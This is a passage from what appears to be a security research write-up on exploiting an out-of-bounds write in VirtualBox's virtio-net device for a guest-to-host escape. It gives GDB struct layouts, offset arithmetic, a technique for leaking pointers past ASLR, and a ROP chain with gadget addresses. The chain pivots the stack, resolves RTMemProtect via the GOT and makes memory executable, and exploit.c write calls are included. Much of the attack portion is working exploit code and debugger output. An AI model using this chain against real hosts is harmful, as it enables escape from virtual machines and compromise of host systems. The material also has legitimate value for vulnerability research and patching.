    pDevInsR3 = 0x7fffb26b3000,
    idxDevCfg = 0x0,
    fReassignableDevNo = 0x1,
    fReassignableFunNo = 0x0,
    bPadding0 = 0x0,
    idxPdmBus = 0x0,
    fRegistered = 0x1,
    idxSubDev = 0x0,
    pBusR3 = 0x7fffdc0002c0,
    pfnConfigRead = 0x7fffb03a0df7 <virtioR3PciConfigRead(PPDMDEVINS, PPDMPCIDEV, uint32_t, unsigned int, uint32_t*)>,
    pfnConfigWrite = 0x7fffb03a10c8 <virtioR3PciConfigWrite(PPDMDEVINS, PPDMPCIDEV, uint32_t, unsigned int, uint32_t)>,
    pfnBridgeConfigRead = 0x0,
    pfnBridgeConfigWrite = 0x0,
    fFlags = 0x0,
    uIrqPinState = 0x0,
    u8MsiCapOffset = 0x0,
    u8MsiCapSize = 0x0,
    u8MsixCapOffset = 0x0,
    u8MsixCapSize = 0x0,
    cbMsixRegion = 0x0,
    offMsixPba = 0x0,
    abPadding2 = "\000\000\000\000\000\000\000",
    hMmioMsix = 0xffffffffffffffff,
    pvPciBusPtrR3 = 0x0,
 
    [Truncated]
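With the layout known, each target field can be translated into the VLAN ID that reaches it. The sketch below is only offset arithmetic. Every constant is read off the GDB output of this particular debug build, so they are assumptions that will differ on other builds, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Offsets taken from the GDB sessions above (debug build; assumptions elsewhere). */
#define OFF_VLAN_FILTER    3172u  /* aVlanFilter inside VIRTIONET */
#define SIZE_VIRTIONET     7536u
#define PAD_BEFORE_CRIT    16u
#define SIZE_CRITSECT      256u
#define OFF_PCIDEV_INT     64u    /* Int union inside PDMPCIDEV */
#define OFF_PDEVINSR3      0x00u  /* fields inside PDMPCIDEVINT */
#define OFF_PFNCONFIGREAD  0x18u
#define OFF_PFNCONFIGWRITE 0x20u
#define TOY_MAX_VLAN_ID    4096u

/* Offset of PDMPCIDEVINT measured from pThis. */
static uint32_t toy_pcidevint_off(void)
{
    return SIZE_VIRTIONET + PAD_BEFORE_CRIT + SIZE_CRITSECT + OFF_PCIDEV_INT;
}

/* VLAN ID that addresses bit 0 of the byte at `off_from_pThis`. */
static uint32_t toy_first_vlan_id(uint32_t off_from_pThis)
{
    assert(off_from_pThis >= OFF_VLAN_FILTER); /* the write only reaches forward */
    return (off_from_pThis - OFF_VLAN_FILTER) * 8u;
}

/* Can `nbytes` starting at this VLAN ID be written through the bug?
 * The IDs must pass the inverted check and fit in a uint16_t. */
static int toy_reachable(uint32_t vlan_id, uint32_t nbytes)
{
    return vlan_id > TOY_MAX_VLAN_ID && vlan_id + nbytes * 8u - 1u <= UINT16_MAX;
}
```

For this build, pDevInsR3 starts at VLAN ID 37600, pfnConfigRead at 37792 and pfnConfigWrite at 37856, all comfortably below the 16-bit limit.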

In fact, by inspecting PPDMDEVINSR3 pDevInsR3, we can confirm that the apPciDevs[0] member points to the PDMPCIDEV structure we had identified earlier:

GDB

gef>   p *(PDMDEVINSR3*)0x7fffb26b3000
{
    u32Version = 0xff820040,
    iInstance = 0x0,
    cbRing3 = 0xd000,
    fR0Enabled = 0x1,
    fRCEnabled = 0x0,
    afReserved = {0x0, 0x0},
    pHlpR3 = 0x7fffd103ab20 <g_pdmR3DevHlpTrusted>,
    pvInstanceDataR3 = 0x7fffb26b3440,
    pvInstanceDataForR3 = 0x7fffb26b3180,
    pCritSectRoR3 = 0x7fffb26b51c0,
    pReg = 0x7fffb07dc400 <g_DeviceVirtioNet>,
    pCfg = 0x7fff9c00dff0,
    IBase = {
    pfnQueryInterface = 0x0
    },
    fTracing = 0x0,
    idTracing = 0x10,
    pDevInsForRCR3 = 0x7fffb26b3400,
    pDevInsForRC = 0x0,
    pvInstanceDataForRCR3 = 0x0,
    cbPciDev = 0xa1c0,
    cPciDevs = 0x1,
    apPciDevs = {0x7fffb26b52c0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
    pDevInsR0RemoveMe = 0xffffa26e050f5000,
    pvInstanceDataR0 = 0xffffa26e050f6440,
    pvInstanceDataRC = 0x0,
    au32Padding = {0x0 <repeats 11 times>},
    Internal = {
    padding = "\000\000k\262\377\177\000\000\000\000\000\000\000\000\000\000\300w\035\234\377\177\000\000@H5\234\377\177\000\000\000\000\000\000\000\000\000\000 \335\000\234\377\177\000\000\000@\002\320\377\177\000\000\377\377\377\377\377\377\377\377", '\000' <repeats 16 times>, "(\000\000\000V\000\020\000\r", '\000' <repeats 54 times>
    },
    achInstanceData = "\337\035;\260\377\177\000"
}

Exploitation Strategy

The members pfnConfigRead and pfnConfigWrite in the PDMPCIDEVINT struct caught my attention. These are callbacks, and they sit within reach of our out-of-bounds write, so overwriting them gives us control of the execution flow. However, we have a problem: we don’t have an information leak yet, so with ASLR we don’t know which addresses to write.

To obtain the leaks, I remembered that the lspci command can query the device’s data, so the host must be reading that information from somewhere on the guest’s behalf. Specifically, the function responsible for this is virtioR3PciConfigRead:

src/VBox/Devices/VirtIO/VirtioCore.cpp

static DECLCALLBACK(VBOXSTRICTRC) virtioR3PciConfigRead(PPDMDEVINS pDevIns, PPDMPCIDEV pPciDev,
                                                        uint32_t uAddress, unsigned cb, uint32_t *pu32Value)
{
    PVIRTIOCORE   pVirtio   = PDMINS_2_DATA(pDevIns, PVIRTIOCORE);
    PVIRTIOCORECC pVirtioCC = PDMINS_2_DATA_CC(pDevIns, PVIRTIOCORECC);
    RT_NOREF(pPciDev);
 
    if (uAddress == pVirtio->uPciCfgDataOff)
    {
     /* See comments in PCI Cfg capability initialization (in capabilities setup section of this code) */
        struct virtio_pci_cap *pPciCap = &pVirtioCC->pPciCfgCap->pciCap;
        uint32_t uLength = pPciCap->uLength;
 
        Log7Func((" pDevIns=%p pPciDev=%p uAddress=%#x%s cb=%u uLength=%d, bar=%d\n",
                     pDevIns, pPciDev, uAddress,  uAddress < 0x10 ? " " : "", cb, uLength, pPciCap->uBar));
 
        if (  (uLength != 1 && uLength != 2 && uLength != 4)
            || pPciCap->uBar != VIRTIO_REGION_PCI_CAP)
        {
            ASSERT_GUEST_MSG_FAILED(("Guest read virtio_pci_cfg_cap.pci_cfg_data using mismatching config. "
                                     "Ignoring\n"));
            *pu32Value = UINT32_MAX;
            return VINF_SUCCESS;
        }
 
        VBOXSTRICTRC rcStrict = virtioMmioRead(pDevIns, pVirtio, pPciCap->uOffset, pu32Value, cb);
        Log7Func((" Guest read virtio_pci_cfg_cap.pci_cfg_data, bar=%d, offset=%d, length=%d, result=0x%x -> %Rrc\n",
                     pPciCap->uBar, pPciCap->uOffset, uLength, *pu32Value, VBOXSTRICTRC_VAL(rcStrict)));
        return rcStrict;
    }
    Log7Func((" pDevIns=%p pPciDev=%p uAddress=%#x%s cb=%u pu32Value=%p\n",
                 pDevIns, pPciDev, uAddress,  uAddress < 0x10 ? " " : "", cb, pu32Value));
    return VINF_PDM_PCI_DO_DEFAULT;
}

The first two lines are quite important:

src/VBox/Devices/VirtIO/VirtioCore.cpp

PVIRTIOCORE   pVirtio   = PDMINS_2_DATA(pDevIns, PVIRTIOCORE);
PVIRTIOCORECC pVirtioCC = PDMINS_2_DATA_CC(pDevIns, PVIRTIOCORECC);

The definition of the macros is as follows:

include/VBox/vmm/pdmins.h

/** @def PDMINS_2_DATA
 * Gets the shared instance data for a PDM device, USB device, or driver instance.
 * @note For devices using PDMDEVINS_2_DATA is highly recommended.
 */
#define PDMINS_2_DATA(pIns, type)       ( (type)(pIns)->CTX_SUFF(pvInstanceData) )

include/VBox/vmm/pdmins.h

/** @def PDMINS_2_DATA_CC
 * Gets the current context instance data for a PDM device, USB device, or driver instance.
 * @note For devices using PDMDEVINS_2_DATA_CC is highly recommended.
 */
#define PDMINS_2_DATA_CC(pIns, type)    ( (type)(void *)&(pIns)->achInstanceData[0] )

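Therefore, pVirtio takes the value stored in pvInstanceDataR3, which is pThis itself (0x7fffb26b3440 in the session above). However, we cannot directly modify the data it points to: the VIRTIOCORE fields live at the start of VIRTIONET, below aVlanFilter, and our write only reaches forward.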

GDB

gef>  ptype /o PDMDEVINSR3
/* offset    |  size */  type = struct PDMDEVINSR3 {
/*    0      |     4 */    uint32_t u32Version;
/*    4      |     4 */    uint32_t iInstance;
/*    8      |     4 */    uint32_t cbRing3;
/*   12      |     1 */    bool fR0Enabled;
/*   13      |     1 */    bool fRCEnabled;
/*   14      |     2 */    bool afReserved[2];
/*   16      |     8 */    PCPDMDEVHLPR3 pHlpR3;
/*   24      |     8 */    RTR3PTR pvInstanceDataR3;
/*   32      |     8 */    RTR3PTR pvInstanceDataForR3;
/*   40      |     8 */    PPDMCRITSECT pCritSectRoR3;
/*   48      |     8 */    PCPDMDEVREG pReg;
/*   56      |     8 */    PCFGMNODE pCfg;
/*   64      |     8 */    PDMIBASE IBase;
/*   72      |     4 */    uint32_t fTracing;
/*   76      |     4 */    uint32_t idTracing;
/*   80      |     8 */    PDMDEVINSRC *pDevInsForRCR3;
/*   88      |     8 */    RTRGPTR pDevInsForRC;
/*   96      |     8 */    RTR3PTR pvInstanceDataForRCR3;
/*  104      |     4 */    uint32_t cbPciDev;
/*  108      |     4 */    uint32_t cPciDevs;
/*  112      |    64 */    PDMPCIDEV *apPciDevs[8];
/*  176      |     8 */    RTHCUINTPTR pDevInsR0RemoveMe;
/*  184      |     8 */    RTR0PTR pvInstanceDataR0;
/*  192      |     4 */    RTRCPTR pvInstanceDataRC;
/*  196      |    44 */    uint32_t au32Padding[11];
/*  240      |   144 */    union {
/*               144 */        uint8_t padding[144];
 
                                 /* total size (bytes):  144 */
                             } Internal;
/*  384      |     8 */    char achInstanceData[8];
 
                             /* total size (bytes):  392 */
                         }

But there is a trick we can use: we can modify the pDevInsR3 pointer in the PDMPCIDEVINT structure to point to pDevInsR3 + 0x10. pvInstanceDataR3 sits at offset 24 and pCritSectRoR3 at offset 40, so through the shifted pointer, pvInstanceDataR3 resolves to the pointer that is stored in pCritSectRoR3. We do this because we know that the critical section is located at pThis + 7536 + 16 (as we observed earlier), which lies after aVlanFilter. With pVirtio pointing there, we are able to modify the contents it reads.
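The effect of the 0x10 shift can be checked with a small model of the first 48 bytes of PDMDEVINSR3, using the offsets printed by ptype /o above. `toy_devins` and `toy_ins_2_data` are hypothetical names. The helper only mimics what PDMINS_2_DATA does in ring-3 on this 64-bit build, namely loading the pointer stored at offset 24 of whatever pIns points to.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* First 48 bytes of PDMDEVINSR3; pointers are modelled as uint64_t. */
struct toy_devins {
    uint32_t u32Version;           /* offset  0 */
    uint32_t iInstance;            /* offset  4 */
    uint32_t cbRing3;              /* offset  8 */
    uint8_t  fR0Enabled;           /* offset 12 */
    uint8_t  fRCEnabled;           /* offset 13 */
    uint8_t  afReserved[2];        /* offset 14 */
    uint64_t pHlpR3;               /* offset 16 */
    uint64_t pvInstanceDataR3;     /* offset 24 */
    uint64_t pvInstanceDataForR3;  /* offset 32 */
    uint64_t pCritSectRoR3;        /* offset 40 */
};

/* Load the 8 bytes found at offset 24 from pIns, wherever pIns really points. */
static uint64_t toy_ins_2_data(const void *pIns)
{
    uint64_t v;
    assert(pIns != NULL);
    memcpy(&v, (const uint8_t *)pIns + offsetof(struct toy_devins, pvInstanceDataR3), sizeof v);
    return v;
}
```

Passing the real base returns pvInstanceDataR3, while passing base + 0x10 returns the value of pCritSectRoR3, because 0x10 + 24 = 40.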

However, there are a series of checks we need to bypass:

src/VBox/Devices/VirtIO/VirtioCore.cpp

if (uAddress == pVirtio->uPciCfgDataOff)

src/VBox/Devices/VirtIO/VirtioCore.cpp

 
[Truncated]
 
struct virtio_pci_cap *pPciCap = &pVirtioCC->pPciCfgCap->pciCap;
uint32_t uLength = pPciCap->uLength;
 
[Truncated]
 
if (  (uLength != 1 && uLength != 2 && uLength != 4)
    || pPciCap->uBar != VIRTIO_REGION_PCI_CAP)
{
    ASSERT_GUEST_MSG_FAILED(("Guest read virtio_pci_cfg_cap.pci_cfg_data using mismatching config. "
                                "Ignoring\n"));
    *pu32Value = UINT32_MAX;
    return VINF_SUCCESS;
}
 
[Truncated]

Therefore, it is necessary to modify these “fields” in order to successfully bypass the checks and trigger the call to:

src/VBox/Devices/VirtIO/VirtioCore.cpp

VBOXSTRICTRC rcStrict = virtioMmioRead(pDevIns, pVirtio, pPciCap->uOffset, pu32Value, cb);

For example, uBar is located at a distance of 7536 + 16 + 0x300 + 4 from pThis:

GDB

gef>  ptype /o pVirtioCC->pPciCfgCap->pciCap
/* offset    |  size */  type = struct virtio_pci_cap {
/*    0      |     1 */    uint8_t uCapVndr;
/*    1      |     1 */    uint8_t uCapNext;
/*    2      |     1 */    uint8_t uCapLen;
/*    3      |     1 */    uint8_t uCfgType;
/*    4      |     1 */    uint8_t uBar;
/*    5      |     3 */    uint8_t uPadding[3];
/*    8      |     4 */    uint32_t uOffset;
/*   12      |     4 */    uint32_t uLength;
 
                             /* total size (bytes):   16 */
                         }
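The same arithmetic works for the other fields of the capability. The sketch below rebuilds the layout printed by GDB as a local struct (virtio_pci_cap_model is my own copy, not the VirtualBox header) and adds the constants quoted in this post, which are specific to this debug build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Local copy of the layout GDB printed above; not the VirtualBox header. */
struct virtio_pci_cap_model {
    uint8_t  uCapVndr;
    uint8_t  uCapNext;
    uint8_t  uCapLen;
    uint8_t  uCfgType;
    uint8_t  uBar;
    uint8_t  uPadding[3];
    uint32_t uOffset;
    uint32_t uLength;
};

/* Constants quoted in the post for this particular build. */
enum {
    CRITSECT_FROM_PTHIS = 7536 + 16,
    PCI_CAP_DELTA       = 0x300
};

/* Distance from pThis to a byte inside pciCap, given its offset in the struct. */
size_t pci_cap_field_from_pthis(size_t field_off)
{
    assert(field_off < sizeof(struct virtio_pci_cap_model));
    return CRITSECT_FROM_PTHIS + PCI_CAP_DELTA + field_off;
}
```

Calling pci_cap_field_from_pthis(offsetof(struct virtio_pci_cap_model, uBar)) gives 8324, and uOffset and uLength follow at 8328 and 8332.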

We are interested in the call to the virtioMmioRead function because this is where the data copy will actually be handled.

src/VBox/Devices/VirtIO/VirtioCore.cpp

 
[Truncated]
 
/*
    * Callback to client to manage device-specific configuration.
    */
VBOXSTRICTRC rcStrict = pVirtioCC->pfnDevCapRead(pDevIns, uOffset, pv, cb);
 
/*
    * Anytime any part of the dev-specific dev config (which this virtio core implementation sees
    * as a blob, and virtio dev-specific code separates into fields) is READ, it must be compared
    * for deltas from previous read to maintain a config gen. seq. counter (VirtIO 1.0, section 4.1.4.3.1)
    */
bool fDevSpecificFieldChanged = RT_BOOL(memcmp(pVirtioCC->pbDevSpecificCfg + uOffset,
                                            pVirtioCC->pbPrevDevSpecificCfg + uOffset,
                                            RT_MIN(cb, pVirtioCC->cbDevSpecificCfg - uOffset)));
 
memcpy(pVirtioCC->pbPrevDevSpecificCfg, pVirtioCC->pbDevSpecificCfg, pVirtioCC->cbDevSpecificCfg);
 
if (pVirtio->fGenUpdatePending || fDevSpecificFieldChanged)
{
    ++pVirtio->uConfigGeneration;
    Log6Func(("Bumped cfg. generation to %d because %s%s\n", pVirtio->uConfigGeneration,
                fDevSpecificFieldChanged ? "<dev cfg changed> " : "",
                pVirtio->fGenUpdatePending ? "<update was pending>" : ""));
    pVirtio->fGenUpdatePending = false;
}
 
[Truncated]

However, we have a couple of small issues. If we take the first if branch, pVirtioCC->pfnDevCapRead no longer points to the correct function (virtioNetR3DevCapRead), because we previously modified the pDevInsR3 pointer.

I considered entering the second if statement, where virtioCommonCfgAccessed is called. To save you part of the analysis process, this turned out to be the correct option:

src/VBox/Devices/VirtIO/VirtioCore.cpp

if (MATCHES_VIRTIO_CAP_STRUCT(off, cb, uOffset, pVirtio->LocCommonCfgCap))
    return virtioCommonCfgAccessed(pDevIns, pVirtio, pVirtioCC, false /* fWrite */, uOffset, cb, pv);

To reach that branch, the following check must pass:

src/VBox/Devices/VirtIO/VirtioCore.cpp

MATCHES_VIRTIO_CAP_STRUCT(off, cb, uOffset, pVirtio->LocCommonCfgCap)

This is a macro, which is defined as:

src/VBox/Devices/VirtIO/VirtioCore.cpp

#define MATCHES_VIRTIO_CAP_STRUCT(a_offAccess, a_cbAccess, a_offsetIntoCap, a_LocCapData) \
    (   ((a_offsetIntoCap) = (uint32_t)((a_offAccess) - (a_LocCapData).offMmio)) < (uint32_t)(a_LocCapData).cbMmio \
     && (a_offsetIntoCap) + (uint32_t)(a_cbAccess) <= (uint32_t)(a_LocCapData).cbMmio )

GDB

gef>  ptype /o VIRTIO_PCI_CAP_LOCATIONS_T
/* offset    |  size */  type = struct VIRTIO_PCI_CAP_LOCATIONS_T {
/*    0      |     2 */    uint16_t offMmio;
/*    2      |     2 */    uint16_t cbMmio;
/*    4      |     2 */    uint16_t offPci;
/*    6      |     2 */    uint16_t cbPci;
 
                           /* total size (bytes):    8 */
                         }

To do this, we can, for example, write a 0 at 7536 + 16 + 1828 + 0 (offMmio) and 0xff at 7536 + 16 + 1828 + 2 (cbMmio).
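To see which accesses those two values let through, the macro can be exercised in isolation. In this sketch the macro body is copied from the source above, cap_loc_model is a local copy of the VIRTIO_PCI_CAP_LOCATIONS_T layout shown by GDB, and access_matches is a hypothetical wrapper added only for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Local copy of the VIRTIO_PCI_CAP_LOCATIONS_T layout shown by GDB. */
typedef struct {
    uint16_t offMmio;
    uint16_t cbMmio;
    uint16_t offPci;
    uint16_t cbPci;
} cap_loc_model;

/* Macro body as quoted from VirtioCore.cpp. */
#define MATCHES_VIRTIO_CAP_STRUCT(a_offAccess, a_cbAccess, a_offsetIntoCap, a_LocCapData) \
    (   ((a_offsetIntoCap) = (uint32_t)((a_offAccess) - (a_LocCapData).offMmio)) < (uint32_t)(a_LocCapData).cbMmio \
     && (a_offsetIntoCap) + (uint32_t)(a_cbAccess) <= (uint32_t)(a_LocCapData).cbMmio )

/* Hypothetical wrapper: reports whether an access of cb bytes at off matches
 * the capability and stores the computed offset into the capability. */
bool access_matches(uint32_t off, uint32_t cb, cap_loc_model loc, uint32_t *puOffset)
{
    assert(puOffset != NULL);
    uint32_t uOffset = 0;
    bool hit = MATCHES_VIRTIO_CAP_STRUCT(off, cb, uOffset, loc);
    *puOffset = uOffset;
    return hit;
}
```

With offMmio = 0 and cbMmio = 0xff, any access that starts and ends within the first 0xff bytes matches, and uOffset is simply the access offset itself, which is what makes the second branch reachable with offsets we choose.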

From the virtioCommonCfgAccessed function, the part we are most interested in is when the calls to VIRTIO_DEV_CONFIG_ACCESS are made, which is again a macro, defined as follows:

src/VBox/Devices/VirtIO/VirtioCore.h

#define VIRTIO_DEV_CONFIG_ACCESS(member, tCfgStruct, uOffsetOfAccess, pCfgStruct) \
    do \
    { \
        uint32_t uOffsetInMember = uOffsetOfAccess - RT_UOFFSETOF(tCfgStruct, member); \
        if (fWrite) \
            memcpy(((char *)&(pCfgStruct)->member) + uOffsetInMember, pv, cb); \
        else \
            memcpy(pv, ((const char *)&(pCfgStruct)->member) + uOffsetInMember, cb); \
        VIRTIO_DEV_CONFIG_LOG_ACCESS(member, tCfgStruct, uOffsetOfAccess); \
    } while(0)

It copies data to or from the specified member field of the config structure, depending on whether fWrite indicates a write or a read operation.
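A reduced model of the macro makes the offset handling easier to follow. Everything here is illustrative: demo_cfg is a hypothetical three-field blob, DEMO_CONFIG_ACCESS has the same shape as VIRTIO_DEV_CONFIG_ACCESS without the logging call, and the bounds assert is something I added for the demo, not something the original macro does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical config blob, only for illustration. */
struct demo_cfg {
    uint32_t uFeatures;
    uint16_t uQueueSize;
    uint16_t uMsixVector;
};

/* Same shape as VIRTIO_DEV_CONFIG_ACCESS, minus the logging call.
 * Like the original, it picks up fWrite, pv and cb from the caller's scope. */
#define DEMO_CONFIG_ACCESS(member, tCfgStruct, uOffsetOfAccess, pCfgStruct) \
    do { \
        uint32_t uOffsetInMember = (uint32_t)((uOffsetOfAccess) - offsetof(tCfgStruct, member)); \
        if (fWrite) \
            memcpy(((char *)&(pCfgStruct)->member) + uOffsetInMember, pv, cb); \
        else \
            memcpy(pv, ((const char *)&(pCfgStruct)->member) + uOffsetInMember, cb); \
    } while (0)

/* Dispatches an access to the member that contains uOffset. */
void demo_cfg_access(struct demo_cfg *cfg, int fWrite, uint32_t uOffset, void *pv, size_t cb)
{
    /* Demo-only guard; the macro itself performs no bounds check. */
    assert(cfg != NULL && pv != NULL && uOffset + cb <= sizeof(struct demo_cfg));

    if (uOffset < offsetof(struct demo_cfg, uQueueSize))
        DEMO_CONFIG_ACCESS(uFeatures, struct demo_cfg, uOffset, cfg);
    else if (uOffset < offsetof(struct demo_cfg, uMsixVector))
        DEMO_CONFIG_ACCESS(uQueueSize, struct demo_cfg, uOffset, cfg);
    else
        DEMO_CONFIG_ACCESS(uMsixVector, struct demo_cfg, uOffset, cfg);
}
```

The point to take away is that the macro trusts whatever pCfgStruct it is handed: if that pointer, or an index used to compute it, is attacker-influenced, the read branch copies out whatever memory sits behind the member.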

We are particularly interested in the accesses made to the member fields of pVirtio->aVirtqueues. Additionally, we can control the value of uVirtq (pVirtio->uVirtqSelect).

By doing this, we can successfully leak the address of pDevInsR3, which is “fragmented” across the member fields: uNotifyOffset, uEnable, and uMsixVector.

This also applies to virtioR3PciConfigRead if we read the same fields, but set uVirtq to 4. Additionally, after obtaining the address of virtioR3PciConfigRead, we can calculate the base address of VBoxDD.so:
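As a rough sketch of the post-processing on the guest side, the three 16-bit reads can be glued back into a pointer and the library base derived from it. Two things here are assumptions rather than facts from the analysis: the low-to-high order of the fields (check it against the VIRTQUEUE layout of your build) and symbol_off, the build-specific offset of virtioR3PciConfigRead inside VBoxDD.so. Both function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: the 48-bit pointer is split low-to-high across
 * uMsixVector, uEnable and uNotifyOffset; verify against your build. */
uint64_t join_leaked_pointer(uint16_t uMsixVector, uint16_t uEnable, uint16_t uNotifyOffset)
{
    return (uint64_t)uMsixVector
         | ((uint64_t)uEnable << 16)
         | ((uint64_t)uNotifyOffset << 32);
}

/* Base = leaked function address minus that function's offset in the library.
 * symbol_off is build-specific and hypothetical here. */
uint64_t module_base(uint64_t leaked_addr, uint64_t symbol_off)
{
    assert(leaked_addr >= symbol_off);
    uint64_t base = leaked_addr - symbol_off;
    assert((base & 0xfff) == 0); /* a sane base is page-aligned */
    return base;
}
```

The page-alignment assert is a cheap sanity check: if it fires, either the field order or the symbol offset is wrong for the build being targeted.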

Now that we have the leaks, we can try to gain control of the execution flow by leveraging the initial idea of corrupting pfnConfigRead.

The call to virtioR3PciConfigRead is made via:

src/VBox/Devices/Bus/DevPCI.cpp

rcStrict = pPciDev->Int.s.pfnConfigRead(pPciDev->Int.s.CTX_SUFF(pDevIns), pPciDev, config_addr, cb, pu32Value);

In fact, if you want to debug the ROP chain, I recommend setting a breakpoint at this location: src/VBox/Devices/Bus/DevPCI.cpp:216.

RAX contains the address of pDevInsR3, with an additional offset of + 0x10 because we modified it earlier:

We have some powerful gadgets at our disposal, such as:

0x00000000004d1a2f: push rax; pop rsp; nop; pop rbp; ret;

This will allow us to pivot the stack:

Additionally, since we can modify the pointer to pDevInsR3, we can make RSP point to a controlled and “safe” area, ensuring that we don’t overwrite important content that could cause crashes.
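To reason about where the chain has to start, it helps to model the pivot gadget against a fake memory window. This is only a simulation of the instruction sequence "push rax; pop rsp; nop; pop rbp; ret"; pivot_state and simulate_pivot are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct pivot_state {
    uint64_t rsp;
    uint64_t rbp;
    uint64_t rip;
};

/* Models the gadget against a fake memory window that starts at address
 * `base` and holds `nqwords` 64-bit slots. */
struct pivot_state simulate_pivot(const uint64_t *mem, size_t nqwords, uint64_t base, uint64_t rax)
{
    assert(mem != NULL && rax >= base && (rax - base) % 8 == 0);
    size_t i = (size_t)((rax - base) / 8);
    assert(i + 2 <= nqwords);

    struct pivot_state s;
    s.rsp = rax;          /* push rax; pop rsp: RSP now equals RAX */
    s.rbp = mem[i];       /* pop rbp consumes the first qword */
    s.rsp += 8;
    s.rip = mem[i + 1];   /* ret jumps to the second qword */
    s.rsp += 8;
    return s;
}
```

So the first qword at the address held in RAX is a throwaway value for RBP, and the first real gadget of the chain goes in the second qword.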

What are our objectives with the ROP chain? The simplest way to execute our own code is through shellcode, but for that the memory region where it is stored needs execute permission. We could attempt a call to mprotect, but mprotect lives in libc.so and we don’t have a libc leak. An alternative is RTMemProtect, but we don’t know its address either, because it lives in VBoxRT.so.

However, we can try to dynamically resolve the address of RTMemProtect. If we take a look at the entries in the GOT, for example, we have the address of RTErrInfoSet, which is located in VBoxRT.so:

0x00007fffb07e4ed8 - 0x00007fffb07e4fe8 is .got in /home/diego/Research/VirtualBox-7.0.10/out/linux.amd64/debug/bin/VBoxDD.so

And we have gadgets like:

Gadgets

0x00000000000656a0: add rax, rdx; pop rbp; ret;

Of course, we also have:

Gadgets

0x00000000000ac71a: pop rdx; ret;
0x00000000001d8489: pop rax; ret;

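Chaining these, with RAX holding the RTErrInfoSet address read from the GOT and RDX holding the constant distance between RTErrInfoSet and RTMemProtect inside VBoxRT.so, add rax, rdx leaves the address of RTMemProtect in RAX: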
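The arithmetic behind this step is just "known address plus a fixed delta". A minimal sketch, with hypothetical function names and with offsets that are placeholders: the real offsets of RTErrInfoSet and RTMemProtect depend on the VBoxRT.so build and have to be read from the binary.

```c
#include <assert.h>
#include <stdint.h>

/* Signed distance between two symbols of the same library.
 * Both offsets are build-specific (hypothetical values in any example). */
int64_t sibling_delta(uint64_t off_known, uint64_t off_target)
{
    return (int64_t)(off_target - off_known);
}

/* Runtime address of the target symbol, given the runtime address of a
 * known symbol from the same library (for example, one read from the GOT). */
uint64_t resolve_sibling(uint64_t known_runtime_addr, uint64_t off_known, uint64_t off_target)
{
    assert(known_runtime_addr >= off_known);
    /* Same arithmetic as "add rax, rdx" with RDX holding the delta. */
    return known_runtime_addr + (uint64_t)sibling_delta(off_known, off_target);
}
```

Because the delta is added modulo 2^64, it does not matter whether the target symbol sits before or after the known one; a negative distance is simply loaded into RDX as its two's-complement value.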

Now we can write that address to the memory region where we’re constructing the ROP chain, allowing us to call RTMemProtect later. After that, the only task left is to set up the arguments for the call:

exploit.c

oob_write(dev, vdev, VBoxDD_addr + pop_rdi_ret, PDMPCIDEVINT_s + ROP_off + (0x8 * 13) - aVlanFilter_off, 64); // pop rdi
oob_write(dev, vdev, pDevInsR3_addr + 0x3000 - 0x200 - 0x200, PDMPCIDEVINT_s + ROP_off + (0x8 * 14) - aVlanFilter_off, 64); // rdi value
oob_write(dev, vdev, VBoxDD_addr + pop_rsi_ret, PDMPCIDEVINT_s + ROP_off + (0x8 * 15) - aVlanFilter_off, 64); // pop rsi
oob_write(dev, vdev, 0x1000, PDMPCIDEVINT_s + ROP_off + (0x8 * 16) - aVlanFilter_off, 64); // rsi value
oob_write(dev, vdev, VBoxDD_addr + pop_rdx_ret, PDMPCIDEVINT_s + ROP_off + (0x8 * 17) - aVlanFilter_off, 64); // pop rdx
oob_write(dev, vdev, RTMEM_PROT_READ | RTMEM_PROT_WRITE | RTMEM_PROT_EXEC, PDMPCIDEVINT_s + ROP_off + (0x8 * 18) - aVlanFilter_off, 64); // rdx value
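If you prefer to look at the chain as a flat array before writing it out, the six slots above can be staged locally first. This is a sketch with hypothetical names; the SKETCH_PROT_* values are the protection flags as I recall them from iprt/mem.h and should be verified there, and the register order follows the x86-64 System V convention (first three arguments in RDI, RSI, RDX).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: flag values as recalled from iprt/mem.h; verify before use. */
#define SKETCH_PROT_READ  0x1
#define SKETCH_PROT_WRITE 0x2
#define SKETCH_PROT_EXEC  0x4

/* Fills slots 13..18 of a local chain image, mirroring the six oob_write
 * calls above. Returns the index of the next free slot. */
size_t stage_memprotect_args(uint64_t *chain, size_t nslots,
                             uint64_t pop_rdi_ret, uint64_t pop_rsi_ret, uint64_t pop_rdx_ret,
                             uint64_t region, uint64_t length, uint64_t prot)
{
    size_t slot = 13;
    assert(chain != NULL && nslots >= slot + 6);

    chain[slot++] = pop_rdi_ret; /* gadget: pop rdi; ret */
    chain[slot++] = region;      /* RDI: start of the region to re-protect */
    chain[slot++] = pop_rsi_ret; /* gadget: pop rsi; ret */
    chain[slot++] = length;      /* RSI: size of the region */
    chain[slot++] = pop_rdx_ret; /* gadget: pop rdx; ret */
    chain[slot++] = prot;        /* RDX: new protection flags */
    return slot;
}
```

Each entry of the array then maps to one oob_write at PDMPCIDEVINT_s + ROP_off + 8 * index - aVlanFilter_off, which keeps the slot numbering in one place.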

After all this, you can see that the permissions have changed and are now rwx.

The only thing remaining is to trigger the pfnConfigRead callback.

Demo

Full exploit

You can find the full exploit on my GitHub repository.

I hope you enjoyed it!
